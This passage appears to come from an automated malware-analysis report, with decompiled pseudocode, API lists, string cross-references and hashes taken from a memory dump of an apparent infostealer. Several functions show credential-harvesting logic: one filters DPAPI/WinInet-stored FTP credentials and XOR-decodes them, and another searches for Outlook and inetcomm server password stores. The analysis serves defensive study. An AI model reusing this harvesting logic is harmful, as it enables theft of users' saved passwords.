																	_push(_t174);
																	L35:
																	_push(_t222);
																	_push(_t227);
																	_t138 = E0021C294();
																	_t237 = _t237 + 0xc;
																	if(_t138 != 0) {
																		goto L66;
																	} else {
																		_t139 = E0021C294(_t227, _t222, "\n");
																		_t237 = _t237 + 0xc;
																		if(_t139 != 0) {
																			goto L66;
																		} else {
																			_t140 = E0021C294(_t227, _t222, L"Line: ");
																			_t237 = _t237 + 0xc;
																			if(_t140 != 0) {
																				goto L66;
																			} else {
																				_t203 = _t227;
																				_t216 = _t203 + 2;
																				do {
																					_t141 =  *_t203;
																					_t203 = _t203 + 2;
																				} while (_t141 != 0);
																				_t217 = _t227;
																				_t198 = _t203 - _t216 >> 1;
																				_t191 = _t217 + 2;
																				do {
																					_t142 =  *_t217;
																					_t217 = _t217 + 2;
																				} while (_t142 != _v540);
																				_t215 = _t217 - _t191 >> 1;
																				_t146 = E0021C222(_t198, _a20, _t227 + (_t217 - _t191 >> 1) * 2, _t222 - _t198, 0xa);
																				_t237 = _t237 + 0x10;
																				if(_t146 != 0) {
																					goto L66;
																				} else {
																					_t147 = E0021C294(_t227, _t222, L"\n\n");
																					_t237 = _t237 + 0xc;
																					if(_t147 != 0) {
																						goto L66;
																					} else {
																						_t148 = E0021C294(_t227, _t222, L"Expression: ");
																						_t237 = _t237 + 0xc;
																						if(_t148 != 0) {
																							goto L66;
																						} else {
																							_t205 = _t227;
																							_t219 = _t205 + 2;
																							do {
																								_t149 =  *_t205;
																								_t205 = _t205 + 2;
																							} while (_t149 != 0);
																							_t215 = (_t205 - _t219 >> 1) + 0xb0;
																							_t208 = _v552;
																							_t191 = _t208 + 2;
																							do {
																								_t150 =  *_t208;
																								_t208 = _t208 + 2;
																							} while (_t150 != _v540);
																							_t198 = _t208 - _t191 >> 1;
																							if(_t198 + _t215 <= _t222) {
																								_push(_v552);
																								goto L52;
																							} else {
																								_push(_t222 - _t215 - 3);
																								_t161 = E0021C3F0(_t198, _t227, _t222, _v552);
																								_t237 = _t237 + 0x10;
																								if(_t161 != 0) {
																									goto L66;
																								} else {
																									_push(L"...");
																									L52:
																									_push(_t222);
																									_push(_t227);
																									_t152 = E0021C294();
																									_t237 = _t237 + 0xc;
																									if(_t152 != 0) {
																										goto L66;
																									} else {
																										_t191 = L"\n\n";
																										_t153 = E0021C294(_t227, _t222, L"\n\n");
																										_t237 = _t237 + 0xc;
																										if(_t153 != 0) {
																											goto L66;
																										} else {
																											_t154 = E0021C294(_t227, _t222, L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_t237 = _t237 + 0xc;
																											if(_t154 != 0) {
																												goto L66;
																											} else {
																												_t155 = E0021C294(_t227, _t222, L"\n\n");
																												_t237 = _t237 + 0xc;
																												if(_t155 != 0) {
																													goto L66;
																												} else {
																													_t156 = E0021C294(_t227, _t222, L"(Press Retry to debug the application - JIT must be enabled)");
																													_t237 = _t237 + 0xc;
																													if(_t156 != 0) {
																														goto L66;
																													} else {
																														_pop(_t223);
																														_pop(_t228);
																														_pop(_t194);
																														return L002007E2(_t156, _t194, _v8 ^ _t230, _t215, _t223, _t228);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t186 = _t198 * 2 - 0x6a;
									_t198 = 0x20a - _t186;
									_t191 =  &_v532 + _t186;
									_t187 = E002062B2( &_v532 + _t186, _t198, L"...", 6);
									_t237 = _t241 + 0x10;
									if(_t187 != 0) {
										goto L66;
									} else {
										goto L10;
									}
								}
							} else {
								_t189 = E00219DBB( &_v532, 0x105, L"<program name unknown>");
								_t237 = _t241 + 0xc;
								if(_t189 != 0) {
									goto L66;
								} else {
									goto L6;
								}
							}
						}
					}
				}
			}

0x0020ea63
0x0020ea66
0x0020ea6e
0x0020ea75
0x0020ea7b
0x0020ea7c
0x0020ea7f
0x0020ea80
0x0020ea83
0x0020ea84
0x0020ea8c
0x0020ea97
0x0020ea9d
0x0020eaa2
0x0020eaa9
0x0020eaae
0x0020ef37
0x0020ef39
0x0020ef3a
0x0020ef3b
0x0020ef3c
0x0020ef3d
0x0020ef3e
0x0020ef43
0x0020ef46
0x0020ef47
0x0020ef49
0x0020ef4a
0x0020ef54
0x0020ef5b
0x0020ef60
0x0020ef63
0x0020ef67
0x0020ef6c
0x0020ef6e
0x0020ef70
0x0020ef76
0x0020ef7b
0x0020ef7c
0x0020ef7d
0x0020ef82
0x0020ef82
0x0020ef85
0x0020ef8e
0x0020ef96
0x0020ef9c
0x0020efa0
0x0020efa4
0x0020efad
0x0020efba
0x0020efc2
0x0020efc7
0x0020efca
0x0020efd0
0x0020efd5
0x0020efef
0x0020eab4
0x0020eabb
0x0020eac0
0x0020eac5
0x00000000
0x0020eacb
0x0020ead2
0x0020ead7
0x0020eadc
0x00000000
0x0020eae2
0x0020eaef
0x0020eaf4
0x0020eaf9
0x0020eb09
0x0020eb11
0x0020eb17
0x0020eb1d
0x0020eb1f
0x0020eb27
0x0020eb35
0x0020eb54
0x0020eb54
0x0020eb5a
0x0020eb5c
0x0020eb5f
0x0020eb5f
0x0020eb62
0x0020eb65
0x0020eb70
0x0020eb78
0x0020eba9
0x0020ebac
0x0020ebb1
0x0020ebb6
0x00000000
0x0020ebbc
0x0020ebc3
0x0020ebc8
0x0020ebcd
0x00000000
0x0020ebd3
0x0020ebda
0x0020ebdf
0x0020ebe4
0x00000000
0x0020ebea
0x0020ebea
0x0020ebf0
0x0020ebf2
0x0020ebf5
0x0020ebf5
0x0020ebf8
0x0020ebfb
0x0020ec06
0x0020ec0e
0x0020ef17
0x00000000
0x0020ec14
0x0020ec14
0x0020ec16
0x0020ec19
0x0020ec19
0x0020ec1c
0x0020ec1f
0x0020ec2a
0x0020ec34
0x0020ec38
0x0020ec39
0x0020ec45
0x0020ec4a
0x0020ec50
0x0020ec53
0x0020ec55
0x0020ec5f
0x0020ec62
0x0020ec63
0x0020ec66
0x0020ec6f
0x00000000
0x00000000
0x00000000
0x0020ec6f
0x0020ec71
0x0020ec74
0x0020ec74
0x0020ec7c
0x0020ec7e
0x0020ec87
0x0020ecd2
0x0020ecd2
0x0020eeaf
0x0020eeb4
0x0020eeb9
0x0020eebc
0x0020eebe
0x00000000
0x0020eec0
0x0020eec7
0x0020eecc
0x0020eecf
0x0020eed1
0x00000000
0x0020eed3
0x0020eed3
0x0020eedf
0x0020eee7
0x0020eeec
0x0020eeef
0x0020eef1
0x00000000
0x0020eef3
0x0020eefa
0x0020eeff
0x0020ef02
0x0020ef04
0x00000000
0x0020ef06
0x0020ef0f
0x00000000
0x0020ef0f
0x0020ef04
0x0020eef1
0x0020eed1
0x0020ecd8
0x0020ecda
0x0020ecdb
0x0020ecdf
0x0020ece5
0x0020ece9
0x0020ecee
0x0020ecf1
0x0020ecf3
0x00000000
0x0020ecf9
0x0020ed00
0x0020ed05
0x0020ed08
0x0020ed0a
0x00000000
0x0020ed10
0x0020ed10
0x0020ed10
0x0020ed1c
0x00000000
0x0020ed1c
0x0020ed0a
0x0020ecf3
0x0020ec89
0x0020ec8c
0x0020eccf
0x00000000
0x0020ec8e
0x0020ec90
0x0020ec93
0x0020ec97
0x0020ec9c
0x0020eca1
0x00000000
0x0020eca7
0x0020ecae
0x0020ecb3
0x0020ecb8
0x00000000
0x0020ecbe
0x0020ecc4
0x0020ecca
0x0020ed1f
0x0020ed1f
0x0020ed20
0x0020ed20
0x0020ed21
0x0020ed22
0x0020ed27
0x0020ed2c
0x00000000
0x0020ed32
0x0020ed39
0x0020ed3e
0x0020ed43
0x00000000
0x0020ed49
0x0020ed50
0x0020ed55
0x0020ed5a
0x00000000
0x0020ed60
0x0020ed60
0x0020ed64
0x0020ed67
0x0020ed67
0x0020ed6a
0x0020ed6d
0x0020ed74
0x0020ed76
0x0020ed78
0x0020ed7b
0x0020ed7b
0x0020ed7e
0x0020ed81
0x0020ed8e
0x0020ed9c
0x0020eda1
0x0020eda6
0x00000000
0x0020edac
0x0020edb3
0x0020edb8
0x0020edbd
0x00000000
0x0020edc3
0x0020edca
0x0020edcf
0x0020edd4
0x00000000
0x0020edda
0x0020edda
0x0020edde
0x0020ede1
0x0020ede1
0x0020ede4
0x0020ede7
0x0020edf0
0x0020edf6
0x0020edfc
0x0020edff
0x0020edff
0x0020ee02
0x0020ee05
0x0020ee10
0x0020ee17
0x0020ef1d
0x00000000
0x0020ee1d
0x0020ee24
0x0020ee2d
0x0020ee32
0x0020ee37
0x00000000
0x0020ee3d
0x0020ee3d
0x0020ee42
0x0020ee42
0x0020ee43
0x0020ee44
0x0020ee49
0x0020ee4e
0x00000000
0x0020ee54
0x0020ee54
0x0020ee5c
0x0020ee61
0x0020ee66
0x00000000
0x0020ee6c
0x0020ee73
0x0020ee78
0x0020ee7d
0x00000000
0x0020ee83
0x0020ee86
0x0020ee8b
0x0020ee90
0x00000000
0x0020ee96
0x0020ee9d
0x0020eea2
0x0020eea7
0x00000000
0x0020eead
0x0020ef2b
0x0020ef2c
0x0020ef2f
0x0020ef36
0x0020ef36
0x0020eea7
0x0020ee90
0x0020ee7d
0x0020ee66
0x0020ee4e
0x0020ee37
0x0020ee17
0x0020edd4
0x0020edbd
0x0020eda6
0x0020ed5a
0x0020ed43
0x0020ed2c
0x0020ecb8
0x0020eca1
0x0020ec8c
0x0020ec87
0x0020ec0e
0x0020ebe4
0x0020ebcd
0x0020eb7a
0x0020eb7a
0x0020eb8d
0x0020eb95
0x0020eb99
0x0020eb9e
0x0020eba3
0x00000000
0x00000000
0x00000000
0x00000000
0x0020eba3
0x0020eb37
0x0020eb44
0x0020eb49
0x0020eb4e
0x00000000
0x00000000
0x00000000
0x00000000
0x0020eb4e
0x0020eb35
0x0020eadc
0x0020eac5

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 0020EB09
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0020EB2D

Strings

For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0020EE6C
\, xrefs: 0020EC2A
Expression: , xrefs: 0020EDC3
<program name unknown>, xrefs: 0020EB37
..., xrefs: 0020EB88, 0020ECA7, 0020ECF9, 0020EE3D, 0020EEC0, 0020EEF3
Line: , xrefs: 0020ED49
Assertion failed!, xrefs: 0020EA87
File: , xrefs: 0020EBD3
(Press Retry to debug the application - JIT must be enabled), xrefs: 0020EE96
Program: , xrefs: 0020EACB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: 285be7c4990c6fb02e75fa77257a2d878716a4dddc9af49c2b957e02fd47dcf9
Instruction ID: befb2ff76873f784d7895e309b1ee9127bda40f1b13f8d7ab6abcd439a0f03ab
Opcode Fuzzy Hash: 285be7c4990c6fb02e75fa77257a2d878716a4dddc9af49c2b957e02fd47dcf9
Instruction Fuzzy Hash: EFC126B4A6031727CF246E248C8AFFF73A8EF65304F0404A9FD05D6182F6349AE1CA61

Uniqueness

Uniqueness Score: -1.00%

Function 001E9B80, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001E9B80(intOrPtr __ecx, WCHAR* __edx) {
				int _t46;
				void* _t61;
				char _t93;
				WCHAR* _t118;
				WCHAR* _t120;
				void* _t123;

				L00227790(0x229e45, _t123);
				_t120 = __edx;
				 *((intOrPtr*)(_t123 - 0x14)) = __ecx;
				_t46 = lstrlenW(__edx);
				if(_t46 != 0) {
					_t46 = lstrlenW( *(_t123 + 8));
					if(_t46 != 0) {
						_t118 = _t120;
						if(StrCmpNW(_t120, L"DPAPI: ", 7) == 0) {
							_t118 =  &(_t120[7]);
						}
						if(StrCmpNW(_t120, L"Microsoft_WinInet_", 0x12) == 0) {
							_t118 =  &(_t118[0x12]);
						}
						_t46 = StrCmpNW(_t118, L"ftp://", 6);
						if(_t46 == 0) {
							_t79 =  *((intOrPtr*)(_t123 - 0x14));
							 *((char*)(_t123 - 0xd)) = 0;
							 *((char*)(_t123 - 0xf)) = 0x62;
							 *((char*)(_t123 - 0xd)) = 0;
							 *((char*)(_t123 - 0xe)) = 0xa;
							E001F5ADB( *((intOrPtr*)(_t123 - 0x14)), _t123 - 0xe, 1);
							E001F5A1E(_t79, _t118, lstrlenW(_t118));
							 *((char*)(_t123 - 0xd)) = 0;
							 *((char*)(_t123 - 0xf)) = 0x35;
							 *((char*)(_t123 - 0xd)) = 0;
							 *((char*)(_t123 - 0xe)) = 0xa;
							E001F5ADB(_t79, _t123 - 0xe, 1);
							E001F5A1E(_t79,  *(_t123 + 8), lstrlenW( *(_t123 + 8)));
							E001D16B4(_t123 - 0xd8);
							 *((intOrPtr*)(_t123 - 4)) = 0;
							_t93 = 0;
							asm("movaps xmm0, [0x23db40]");
							asm("movups [ebp-0x25], xmm0");
							 *((char*)(_t123 - 0x15)) = 0;
							do {
								 *(_t123 + _t93 - 0x24) =  *(_t123 + _t93 - 0x24) ^  *(_t123 - 0x25);
								_t93 = _t93 + 1;
								_t135 = _t93 - 0xf;
							} while (_t93 < 0xf);
							 *((char*)(_t123 - 0x15)) = 0;
							_t61 = E001F5C6D();
							_push(_t93);
							_push(_t93);
							E001D1624(_t123 - 0xd8, _t135, L001F57CC(_t61, _t123 - 0x24));
							E001D3B98(_t123 - 0xd8, E001F5B62(_t135));
							 *((char*)(_t123 - 0xd)) = 0;
							 *((char*)(_t123 - 0xf)) = 0x7c;
							 *((char*)(_t123 - 0xe)) = 0xa;
							E001D3B98(_t123 - 0xd8, _t123 - 0xe);
							E001D3B98(_t123 - 0xd8, E001F5B62(_t135));
							 *((char*)(_t123 - 0x11)) = 0;
							 *((char*)(_t123 - 0x13)) = 0x30;
							 *((char*)(_t123 - 0x12)) = 0xa;
							E001D3B98(_t123 - 0xd8, _t123 - 0x12);
							E001D15F4(_t123 - 0xd8);
							_t46 = E001D0602(_t123 - 0xd8);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0xc));
				return _t46;
			}

0x001e9b85
0x001e9b99
0x001e9b9b
0x001e9b9f
0x001e9ba3
0x001e9bac
0x001e9bb0
0x001e9bbc
0x001e9bca
0x001e9bcc
0x001e9bcc
0x001e9bdb
0x001e9bdd
0x001e9bdd
0x001e9be8
0x001e9bec
0x001e9bf2
0x001e9bfa
0x001e9c00
0x001e9c05
0x001e9c0d
0x001e9c10
0x001e9c24
0x001e9c2c
0x001e9c32
0x001e9c37
0x001e9c40
0x001e9c45
0x001e9c56
0x001e9c61
0x001e9c68
0x001e9c6b
0x001e9c6d
0x001e9c74
0x001e9c78
0x001e9c7b
0x001e9c7e
0x001e9c82
0x001e9c83
0x001e9c83
0x001e9c88
0x001e9c8b
0x001e9c90
0x001e9c91
0x001e9ca3
0x001e9cb7
0x001e9cbe
0x001e9cc3
0x001e9cd1
0x001e9cd4
0x001e9ce9
0x001e9cf0
0x001e9cf5
0x001e9d03
0x001e9d06
0x001e9d11
0x001e9d1c
0x001e9d1c
0x001e9bec
0x001e9bb0
0x001e9d26
0x001e9d2f

APIs

__EH_prolog.LIBCMT ref: 001E9B85
lstrlenW.KERNEL32(?,?,?,0023935B), ref: 001E9B9F
lstrlenW.KERNEL32(?,?,?,?,0023935B), ref: 001E9BAC
StrCmpNW.SHLWAPI(?,DPAPI: ,00000007,?,?,?,0023935B), ref: 001E9BC6
StrCmpNW.SHLWAPI(?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,0023935B), ref: 001E9BD7
StrCmpNW.SHLWAPI(?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,0023935B), ref: 001E9BE8
lstrlenW.KERNEL32(?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,0023935B), ref: 001E9C1D
lstrlenW.KERNEL32(?,?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,0023935B), ref: 001E9C4E

Part of subcall function 001D3B98: __EH_prolog.LIBCMT ref: 001D3B9D

Part of subcall function 001D0602: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001D0630

Strings

Microsoft_WinInet_, xrefs: 001E9BD1
DPAPI: , xrefs: 001E9BC0
ftp://, xrefs: 001E9BE2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$H_prolog$Ios_base_dtorstd::ios_base::_
String ID: DPAPI: $Microsoft_WinInet_$ftp://
API String ID: 3832056751-2984799227
Opcode ID: 170bf9477ea29c89029ab15eed66497e3b84255c38ceb4cbe0ec3d5eff7c255f
Instruction ID: a0437723c7390370bd9ac508d58d3e3e3b43e967e52e2e64a741931ebfdddf51
Opcode Fuzzy Hash: 170bf9477ea29c89029ab15eed66497e3b84255c38ceb4cbe0ec3d5eff7c255f
Instruction Fuzzy Hash: 9C41E830900799ABDF11EBE8CC91AEEBBB59F65340F10809AE50577242DF709A4AC761

Uniqueness

Uniqueness Score: -1.00%

Function 001F523E, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 99
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001F523E(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				void* _t31;
				WCHAR* _t32;
				intOrPtr* _t58;
				WCHAR* _t59;
				intOrPtr _t60;

				_t58 = _a8;
				_t60 = 0;
				_v28 = 0x10;
				_v24 = 2;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x44))))(_t58, 0, _a12, _a16, _a20,  &_v12,  &_v8,  &_v28, 0);
				if(_t31 >= 0 && _v8 != 0 && _v12 != 0) {
					_t32 = E001F48FF(_t58, _a12);
					_a8 = _t32;
					if(_t32 == 0) {
						L14:
						return  *0x22d3a4(_v8);
					}
					if(lstrcmpiW(_t32, L"identification") == 0 || lstrcmpiW(_a8, L"identitymgr") == 0) {
						_t59 = E001F494F(_t58, _a12, _a16);
						if(_t59 == 0) {
							goto L13;
						}
						if(lstrcmpiW(_t59, L"inetcomm server passwords") == 0 || lstrcmpiW(_t59, L"outlook account manager passwords") == 0) {
							L11:
							L001F4FE3(_a4, _a20, _a16, _t59, _v8, _v12, _t60);
							goto L12;
						} else {
							if(lstrcmpiW(_t59, L"identities") != 0) {
								L12:
								E00205A55(_t59);
								goto L13;
							}
							_t60 = 1;
							goto L11;
						}
					} else {
						L13:
						E00205A55(_a8);
						goto L14;
					}
				}
				return _t31;
			}

0x001f5246
0x001f524c
0x001f524e
0x001f5260
0x001f526b
0x001f5271
0x001f5277
0x001f527b
0x001f5282
0x001f5286
0x001f52a3
0x001f52a8
0x001f52ad
0x001f5339
0x00000000
0x001f533c
0x001f52c4
0x001f52e1
0x001f52e6
0x00000000
0x00000000
0x001f52f2
0x001f530f
0x001f5320
0x00000000
0x001f5300
0x001f530a
0x001f5328
0x001f5329
0x00000000
0x001f532e
0x001f530e
0x00000000
0x001f530e
0x001f532f
0x001f532f
0x001f5332
0x00000000
0x001f5338
0x001f52c4
0x001f5345

APIs

Part of subcall function 001F48FF: lstrlenW.KERNEL32(86840FC0,?,001F52A8), ref: 001F4923
Part of subcall function 001F48FF: lstrcpyW.KERNEL32 ref: 001F493A
Part of subcall function 001F48FF: CoTaskMemFree.OLE32(001F52A8,?,001F52A8), ref: 001F4943

lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 001F52C0
lstrcmpiW.KERNEL32(001F48D9,identitymgr), ref: 001F52CE
lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 001F52EE
lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 001F52FA
lstrcmpiW.KERNEL32(00000000,identities), ref: 001F5306
CoTaskMemFree.OLE32(?), ref: 001F533C

Strings

identities, xrefs: 001F5300
inetcomm server passwords, xrefs: 001F52E8
identification, xrefs: 001F52BA
identitymgr, xrefs: 001F52C6
outlook account manager passwords, xrefs: 001F52F4

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$FreeTask$lstrcpylstrlen
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 1606502731-4287852900
Opcode ID: 64fc391ba16d2c1ffdfa47c498f0c617131e3e69e2ce156abd36fe9c9548da7a
Instruction ID: 7ea2a062b1e3c398ecd93304d9b2b2481fa3d639cc8419168a81b54e562c7775
Opcode Fuzzy Hash: 64fc391ba16d2c1ffdfa47c498f0c617131e3e69e2ce156abd36fe9c9548da7a
Instruction Fuzzy Hash: 3D314B75A0071AABCF119F99CD859BF7F7AFF49790F104019FA04A2250DB71DA21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FD9B8, Relevance: 16.7, APIs: 11, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001FD9B8(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr* _a8, signed int* _a12) {
				void _v8;
				void _v12;
				long _v16;
				void _v20;
				signed int* _v24;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				signed int* _t50;
				intOrPtr* _t51;
				void _t76;
				signed int _t78;
				void* _t80;
				signed int _t90;
				long _t103;
				intOrPtr _t108;
				signed int _t112;
				signed int _t117;
				long _t118;
				intOrPtr* _t119;
				signed int* _t120;

				_v24 = __edx;
				_v8 = __ecx;
				if(GetFileInformationByHandle(__ecx,  &_v76) == 0) {
					return 0x200;
				}
				_t78 = _v76.dwFileAttributes;
				_t117 = _t78 & 0x00000001;
				_t85 =  ==  ? _t117 : _t117 | 0x00000002;
				_t107 =  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004;
				_v12 = _t78 & 0x00000010;
				_t47 =  ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010;
				_t108 = 0x81000000;
				_t90 =  ==  ?  ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010 : ( ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010) | 0x00000020;
				_t111 =  ==  ? 0x81000000 : 0x41000000;
				_t112 = ( ==  ? 0x81000000 : 0x41000000) | _t90;
				if(_t117 == 0) {
					_t108 = 0x81800000;
					_t115 =  ==  ? 0x81800000 : 0x41800000;
					_t112 = ( ==  ? 0x81800000 : 0x41800000) | _t90;
				}
				_t80 = _v8;
				_t118 = GetFileSize(_t80, 0);
				if(_t118 > 0x28) {
					SetFilePointer(_t80, 0, 0, 0);
					ReadFile(_t80,  &_v8, 2,  &_v16, 0);
					SetFilePointer(_t80, 0x24, 0, 0);
					ReadFile(_t80,  &_v12, 4,  &_v16, 0);
					if(_v8 == 0x54ad) {
						_t103 = _v12;
						if(_t118 > _t103 + 0x34) {
							SetFilePointer(_t80, _t103, 0, 0);
							ReadFile(_t80,  &_v20, 4,  &_v16, 0);
							_t76 = _v20;
							if(_t76 == 0x5a4d || _t76 == 0x454e || _t76 == 0x454c || _t76 == 0x4550) {
								_t112 = _t112 | 0x00400000;
							}
						}
					}
				}
				_t50 = _v24;
				if(_t50 != 0) {
					 *_t50 = _t112;
				}
				_t51 = _a4;
				if(_t51 != 0) {
					 *_t51 = _t118;
				}
				_t119 = _a8;
				if(_t119 != 0) {
					asm("sbb eax, ebx");
					 *_t119 = E002272B0(_v76.ftLastAccessTime - 0xd53e8000, _v60, 0x989680, 0);
					asm("sbb eax, ebx");
					 *((intOrPtr*)(_t119 + 4)) = _t108;
					 *((intOrPtr*)(_t119 + 8)) = E002272B0(_v76.ftLastWriteTime - 0xd53e8000, _v52, 0x989680, 0);
					asm("sbb eax, ebx");
					 *((intOrPtr*)(_t119 + 0xc)) = _t108;
					 *((intOrPtr*)(_t119 + 0x10)) = E002272B0(_v76.ftCreationTime - 0xd53e8000, _v68, 0x989680, 0);
					 *((intOrPtr*)(_t119 + 0x14)) = _t108;
				}
				_t120 = _a12;
				if(_t120 != 0) {
					_push(_v52);
					E001FD95B( &_v8,  &_v12, _v76.ftLastWriteTime);
					 *_t120 = (_v8 & 0x0000ffff) << 0x00000010 | _v12 & 0x0000ffff;
				}
				return 0;
			}

0x001fd9c4
0x001fd9c9
0x001fd9d4
0x00000000
0x001fd9d6
0x001fd9e0
0x001fd9ec
0x001fd9f8
0x001fda02
0x001fda0f
0x001fda14
0x001fda17
0x001fda24
0x001fda2c
0x001fda2f
0x001fda33
0x001fda3c
0x001fda41
0x001fda44
0x001fda44
0x001fda46
0x001fda52
0x001fda57
0x001fda63
0x001fda76
0x001fda83
0x001fda96
0x001fdaa5
0x001fdaa7
0x001fdaaf
0x001fdab7
0x001fdaca
0x001fdad0
0x001fdad8
0x001fdaef
0x001fdaef
0x001fdad8
0x001fdaaf
0x001fdaa5
0x001fdaf5
0x001fdafa
0x001fdafc
0x001fdafc
0x001fdafe
0x001fdb03
0x001fdb05
0x001fdb05
0x001fdb07
0x001fdb0c
0x001fdb26
0x001fdb33
0x001fdb41
0x001fdb43
0x001fdb50
0x001fdb5f
0x001fdb61
0x001fdb6b
0x001fdb6e
0x001fdb6e
0x001fdb71
0x001fdb76
0x001fdb78
0x001fdb84
0x001fdb98
0x001fdb98
0x00000000

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?,00000000), ref: 001FD9CC
GetFileSize.KERNEL32(?,00000000), ref: 001FDA4C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 001FDA63
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 001FDA76
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 001FDA83
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 001FDA96
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 001FDAB7
ReadFile.KERNEL32(?,001FDEB9,00000004,?,00000000), ref: 001FDACA

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 500f4bf42ccdb063d221328267f530214fe3d17bd8412b8072f4b630f2f38bc5
Instruction ID: 2e332a85bff1dc6fd4b772e9f2f865512b58ef3d0b160287ea8cf9212a225ac7
Opcode Fuzzy Hash: 500f4bf42ccdb063d221328267f530214fe3d17bd8412b8072f4b630f2f38bc5
Instruction Fuzzy Hash: BA5151B1A00218BFEB24DFA8DC85BBEB7B9EB44704F554569FA06E7280D770DD018B64

Uniqueness

Uniqueness Score: -1.00%

Function 00203370, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132
COMMON

